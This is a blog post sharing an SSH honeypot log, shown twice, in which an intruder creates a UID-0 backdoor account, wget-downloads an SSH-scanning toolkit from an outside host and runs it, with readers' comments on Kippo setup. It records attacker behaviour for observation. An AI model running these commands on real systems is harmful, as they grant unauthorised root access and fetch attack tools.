SeventhOctober.net

sequel7's ramblings

O RLY?

with 3 comments

It would appear that my first shot at a honeypot has been an amusing success :-)

www:~# w
13:27:54 up 14 days,  3:53,  1 user,  load average: 0.08, 0.02, 0.01
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    77.28.252.122     13:27    0.00s  0.00s  0.00s w
www:~# ls
www:~# uptime
13:28:00 up 14 days,  3:53,  0 users,  load average: 0.08, 0.02, 0.01
www:~# wget
wget: missing URL
Usage: wget [OPTION]… [URL]…

Try `wget –help’ for more options.
www:~# cat /proc/cpuinfo
processor    : 0
vendor_id    : GenuineIntel
cpu family    : 6
model        : 23
model name    : Intel(R) Core(TM)2 Duo CPU     E8200  @ 2.66GHz
stepping    : 6
cpu MHz        : 2133.305
cache size    : 6144 KB
physical id    : 0
siblings    : 2
core id        : 0
cpu cores    : 2
apicid        : 0
initial apicid    : 0
fpu        : yes
fpu_exception    : yes
cpuid level    : 10
wp        : yes
flags        : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips    : 4270.03
clflush size    : 64
cache_alignment    : 64
address sizes    : 36 bits physical, 48 bits virtual
power management:

processor    : 1
vendor_id    : GenuineIntel
cpu family    : 6
model        : 23
model name    : Intel(R) Core(TM)2 Duo CPU     E8200  @ 2.66GHz
stepping    : 6
cpu MHz        : 2133.305
cache size    : 6144 KB
physical id    : 0
siblings    : 2
core id        : 1
cpu cores    : 2
apicid        : 1
initial apicid    : 1
fpu        : yes
fpu_exception    : yes
cpuid level    : 10
wp        : yes
flags        : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips    : 4266.61
clflush size    : 64
cache_alignment    : 64
address sizes    : 36 bits physical, 48 bits virtual
power management:

www:~# wget
wget: missing URL
Usage: wget [OPTION]… [URL]…

Try `wget –help’ for more options.
www:~# passwd
Enter new UNIX password: islamizacija54321
Retype new UNIX password: islamizacija54321
Sorry, passwords do not match
passwd: Authentication information cannot be recovered
passwd: password unchanged
www:~# passwd
Enter new UNIX password: islamizacija54321
Retype new UNIX password: islamizacija54321
Sorry, passwords do not match
passwd: Authentication information cannot be recovered
passwd: password unchanged
www:~# /usr/sbin/useradd -o -u 0 user
Adding user `user’ …
Adding new group `user’ (1001) …
Adding new user `user’ (1001) with group `user’ …
Creating home directory `/home/user’ …
Copying files from `/etc/skel’ …
Password: islamizacija54321
Password again: islamizacija54321

Changing the user information for test123
Enter the new value, or press ENTER for the default
Username []: serdzan
Full Name []: serdzan abdi
Room Number []: 1
Work Phone []: /
Home Phone []: /
Mobile Phone []: /
Country []: /
City []: /
Language []: /
Favorite movie []: /
Other []: /
Is the information correct? [Y/n] y
ERROR: Some of the information you entered is invalid
Deleting user `user’ …
Deleting group `user’ (1001) …
Deleting home directory `/home/user’ …
Try again? [Y/n] n
www:~# adduser
adduser: Only one or two names allowed.
www:~# adduser serdzan
Adding user `serdzan’ …
Adding new group `serdzan’ (1001) …
Adding new user `serdzan’ (1001) with group `serdzan’ …
Creating home directory `/home/serdzan’ …
Copying files from `/etc/skel’ …
Password: islamizacija54321
Password again: islamizacija54321

Changing the user information for test123
Enter the new value, or press ENTER for the default
Username []: hi
Full Name []: hhi
Room Number []: 2
Work Phone []: /
Home Phone []: +38970554214
Mobile Phone []: +35897052555
Country []: bulgaria
City []: sofia
Language []: english
Favorite movie []: 2012
Other []: noting
Is the information correct? [Y/n] y
ERROR: Some of the information you entered is invalid
Deleting user `serdzan’ …
Deleting group `serdzan’ (1001) …
Deleting home directory `/home/serdzan’ …
Try again? [Y/n] n
www:~# wget http://gblteam.webs.com/gosh.tgz.tar
–2010-04-08 13:39:02–  http://gblteam.webs.com/gosh.tgz.tar
Connecting to gblteam.webs.com:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 1642769 (1M) [application/x-tar]
Saving to: `gosh.tgz.tar

100%[======================================>] 1,642,769    143K/s  eta 0s

2010-04-08 13:39:13 (143 KB/s) – `gosh.tgz.tar’ saved [1642769/1642769]
www:~# tar -zxvf gosh.tgz.tar
gosh
gosh/3
gosh/4
gosh/common
gosh/go.sh
gosh/scam
gosh/pscan2
gosh/ss
gosh/5
gosh/vuln.txt
gosh/1
gosh/mfu.txt
gosh/pass_file
gosh/gen-pass.sh
gosh/secure
gosh/2
gosh/ssh-scan
gosh/a
www:~# cd gosh
www:/root/gosh# touch bios.txt
bash: touch: command not found
www:/root/gosh# touch bios.txt
bash: touch: command not found
www:/root/gosh# chmod +x *
www:/root/gosh# ./go.sh 77
___
{o,o}
|)__)
-”-”-
O RLY?
___
{o,o}
|)__)
-”-”-
O RLY? y
___
{o,o}
(__(|
-”-”-
NO WAI!
www:/root/gosh# ./go.sh 77
___
{o,o}
|)__)
-”-”-
O RLY? yes
___
{o,o}
(__(|
-”-”-
NO WAI!
www:/root/gosh# ./go
bash: ./go: command not found
www:/root/gosh# ./go.sh
___
{o,o}
|)__)
-”-”-
O RLY? no
___
{o,o}
|)__)
-”-”-
O RLY? no
___
{o,o}
|)__)
-”-”-
O RLY? k
___
{o,o}
|)__)
-”-”-
O RLY? y
___
{o,o}
(__(|
-”-”-
NO WAI!
www:/root/gosh#

www:~# w
13:27:54 up 14 days,  3:53,  1 user,  load average: 0.08, 0.02, 0.01
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    77.28.252.122     13:27    0.00s  0.00s  0.00s w
www:~# ls
www:~# uptime
13:28:00 up 14 days,  3:53,  0 users,  load average: 0.08, 0.02, 0.01
www:~# wget
wget: missing URL
Usage: wget [OPTION]… [URL]…

Try `wget –help’ for more options.
www:~# cat /proc/cpuinfo
processor    : 0
vendor_id    : GenuineIntel
cpu family    : 6
model        : 23
model name    : Intel(R) Core(TM)2 Duo CPU     E8200  @ 2.66GHz
stepping    : 6
cpu MHz        : 2133.305
cache size    : 6144 KB
physical id    : 0
siblings    : 2
core id        : 0
cpu cores    : 2
apicid        : 0
initial apicid    : 0
fpu        : yes
fpu_exception    : yes
cpuid level    : 10
wp        : yes
flags        : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips    : 4270.03
clflush size    : 64
cache_alignment    : 64
address sizes    : 36 bits physical, 48 bits virtual
power management:

processor    : 1
vendor_id    : GenuineIntel
cpu family    : 6
model        : 23
model name    : Intel(R) Core(TM)2 Duo CPU     E8200  @ 2.66GHz
stepping    : 6
cpu MHz        : 2133.305
cache size    : 6144 KB
physical id    : 0
siblings    : 2
core id        : 1
cpu cores    : 2
apicid        : 1
initial apicid    : 1
fpu        : yes
fpu_exception    : yes
cpuid level    : 10
wp        : yes
flags        : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips    : 4266.61
clflush size    : 64
cache_alignment    : 64
address sizes    : 36 bits physical, 48 bits virtual
power management:

www:~# wget
wget: missing URL
Usage: wget [OPTION]… [URL]…

Try `wget –help’ for more options.
www:~# passwd
Enter new UNIX password:
Retype new UNIX password:
Sorry, passwords do not match
passwd: Authentication information cannot be recovered
passwd: password unchanged
www:~# passwd
Enter new UNIX password:
Retype new UNIX password:
Sorry, passwords do not match
passwd: Authentication information cannot be recovered
passwd: password unchanged
www:~# /usr/sbin/useradd -o -u 0 user
Adding user `user’ …
Adding new group `user’ (1001) …
Adding new user `user’ (1001) with group `user’ …
Creating home directory `/home/user’ …
Copying files from `/etc/skel’ …
Password:
Password again:

Changing the user information for test123
Enter the new value, or press ENTER for the default
Username []: serdzan
Full Name []: serdzan abdi
Room Number []: 1
Work Phone []: /
Home Phone []: /
Mobile Phone []: /
Country []: /
City []: /
Language []: /
Favorite movie []: /
Other []: /
Is the information correct? [Y/n] y
ERROR: Some of the information you entered is invalid
Deleting user `user’ …
Deleting group `user’ (1001) …
Deleting home directory `/home/user’ …
Try again? [Y/n] n
www:~# adduser
adduser: Only one or two names allowed.
www:~# adduser serdzan
Adding user `serdzan’ …
Adding new group `serdzan’ (1001) …
Adding new user `serdzan’ (1001) with group `serdzan’ …
Creating home directory `/home/serdzan’ …
Copying files from `/etc/skel’ …
Password:
Password again:

Changing the user information for test123
Enter the new value, or press ENTER for the default
Username []: hi
Full Name []: hhi
Room Number []: 2
Work Phone []: /
Home Phone []: +38970554214
Mobile Phone []: +35897052555
Country []: bulgaria
City []: sofia
Language []: english
Favorite movie []: 2012
Other []: noting
Is the information correct? [Y/n] y
ERROR: Some of the information you entered is invalid
Deleting user `serdzan’ …
Deleting group `serdzan’ (1001) …
Deleting home directory `/home/serdzan’ …
Try again? [Y/n] n
www:~# wget http://gblteam.webs.com/gosh.tgz.tar
–2010-04-08 13:39:02–  http://gblteam.webs.com/gosh.tgz.tar
Connecting to gblteam.webs.com:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 1642769 (1M) [application/x-tar]
Saving to: `gosh.tgz.tar

100%[======================================>] 1,642,769    143K/s  eta 0s

2010-04-08 13:39:13 (143 KB/s) – `gosh.tgz.tar’ saved [1642769/1642769]
www:~# tar -zxvf gosh.tgz.tar
gosh
gosh/3
gosh/4
gosh/common
gosh/go.sh
gosh/scam
gosh/pscan2
gosh/ss
gosh/5
gosh/vuln.txt
gosh/1
gosh/mfu.txt
gosh/pass_file
gosh/gen-pass.sh
gosh/secure
gosh/2
gosh/ssh-scan
gosh/a
www:~# cd gosh
www:/root/gosh# touch bios.txt
bash: touch: command not found
www:/root/gosh# touch bios.txt
bash: touch: command not found
www:/root/gosh# chmod +x *
www:/root/gosh# ./go.sh 77
___
{o,o}
|)__)
-”-”-
O RLY?
___
{o,o}
|)__)
-”-”-
O RLY? y
___
{o,o}
(__(|
-”-”-
NO WAI!
www:/root/gosh# ./go.sh 77
___
{o,o}
|)__)
-”-”-
O RLY? yes
___
{o,o}
(__(|
-”-”-
NO WAI!
www:/root/gosh# ./go
bash: ./go: command not found
www:/root/gosh# ./go.sh
___
{o,o}
|)__)
-”-”-
O RLY? no
___
{o,o}
|)__)
-”-”-
O RLY? no
___
{o,o}
|)__)
-”-”-
O RLY? k
___
{o,o}
|)__)
-”-”-
O RLY? y
___
{o,o}
(__(|
-”-”-
NO WAI!
www:/root/gosh#

Written by sequel7

April 8th, 2010 at 2:49 pm

Posted in Hacking

3 Responses to 'O RLY?'

Subscribe to comments with RSS or TrackBack to 'O RLY?'.

  1. You’ve gotta love watching people ‘hack’ your Kippo box!

    Thanks for sharing, gave me the nudge to go back and take a closer look at the hits I’ve had on my installation since last look.

    –Andrew Waite

    Andrew Waite

    1 Jan 11 at 04:35

  2. This is great, Kippo is awesome and my top 5 honeypots.
    I highly recomend NOT running it as root, and giving it user privs. Have it listen on port 2222 (default) and depending on your setup, use port forwarding to have it listen on port 22, (ssh default)

    Yankee

    5 Mar 11 at 22:03

  3. Yup, that’s actually exactly the way I had it set up :-) Had a lot of fun with that… I should set it up again sometime.

    sequel7

    5 Mar 11 at 22:05

Leave a Reply

You must be logged in to post a comment.